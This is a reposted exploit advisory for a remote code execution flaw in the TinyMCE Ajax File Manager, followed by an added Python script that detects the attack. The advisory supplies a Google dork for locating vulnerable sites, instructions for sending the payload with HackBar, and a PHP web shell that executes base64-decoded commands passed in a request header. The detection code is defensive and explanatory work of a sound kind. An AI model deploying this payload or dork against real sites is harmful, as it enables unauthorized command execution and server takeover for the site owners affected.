且构网

Sharing the things programmers deal with in development...

TinyMCE Ajax File Manager suffers from a remote code execution vulnerability.

Updated: 2022-09-10 23:11:48

 ____   ____   ____   _______/  |________   ____   ____ 
 /  _ \ /    \_/ __ \ /  ___/\   __\_  __ \_/ __ \_/ __ \
(  <_> )   |  \  ___/ \___ \  |  |  |  | \/\  ___/\  ___/
 \____/|___|  /\___  >____  > |_ |  |__|    \___  >\___  >
            \/     \/     \/                    \/     \/
      
 
# Exploit Title : TinyMCE Ajax File Manager Remote Code 
# Author        : By onestree
# Software Link : http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/
# Tested        : Windows 7
# Dork          : inurl:"/plugins/filemanager/" or inurl:'/timynce/plugins/"
 
 
*************************************************************
 
How to run the exploit: use the Firefox web browser
and download the Firefox add-on HackBar.

exploit : 

foo=<?php error_reporting(0);print(system('onestree'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>

 ====================================================================
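A defender-side check for the pattern in the payload above, as an added example that is not part of the original advisory: it flags requests whose decoded body carries PHP code that reads the Cmd request header (PHP exposes that header as HTTP_CMD) and decodes the header so a responder can see what was run. The request dictionaries, the path and the function names are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote_plus

# Markers taken from the payload shown above: a PHP open tag, command-execution
# calls, and a read of the Cmd request header via $_SERVER[HTTP_CMD].
BODY_MARKERS = {
    "php_open_tag": re.compile(r"<\?php", re.I),
    "exec_call": re.compile(r"\b(?:system|passthru)\s*\(", re.I),
    "header_channel": re.compile(r"\$_SERVER\[\s*['\"]?HTTP_CMD['\"]?\s*\]", re.I),
}

def decode_cmd_header(headers):
    """Return the base64-decoded Cmd header, or None if absent or not base64."""
    for name, value in headers.items():
        if name.lower() == "cmd":
            try:
                raw = base64.b64decode(value, validate=True)
            except (binascii.Error, ValueError):
                return None
            return raw.decode("utf-8", "replace")
    return None

def inspect_request(req):
    """req: dict with 'path', 'headers' (dict) and 'body' (form-encoded str)."""
    body = unquote_plus(req.get("body", ""))  # undo %XX and '+' before matching
    hits = sorted(name for name, rx in BODY_MARKERS.items() if rx.search(body))
    decoded = decode_cmd_header(req.get("headers", {}))
    # Two or more body markers, or any decodable Cmd header, is worth triage.
    return {"path": req.get("path"), "body_markers": hits,
            "decoded_cmd": decoded, "alert": len(hits) >= 2 or decoded is not None}

# Constructed sample requests (not captured traffic); the path is a placeholder.
SAMPLE_REQUESTS = [
    {"path": "/plugins/filemanager/EXAMPLE.php",
     "headers": {"Cmd": "d2hvYW1p"},
     "body": "foo=%3C%3Fphp+error_reporting%280%29%3Bpassthru%28base64_decode"
             "%28%24_SERVER%5BHTTP_CMD%5D%29%29%3Bdie%3B+%3F%3E"},
    {"path": "/plugins/filemanager/EXAMPLE.php",
     "headers": {"User-Agent": "Mozilla/5.0"},
     "body": "foo=bar&name=report.txt"},
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(inspect_request(request))
```

A Cmd header that merely happens to be valid base64 also raises the alert, so treat a header-only hit as a lead to correlate with the body markers, not as proof.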

tutorial video 
https://www.***.com/watch?v=ahli-dehYWY


Thanks :
 
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
      
          indonesiancoder - moeslimh4x0r - go-coder
 
spesial my hunny ( Fheby Yahya) :* muaaah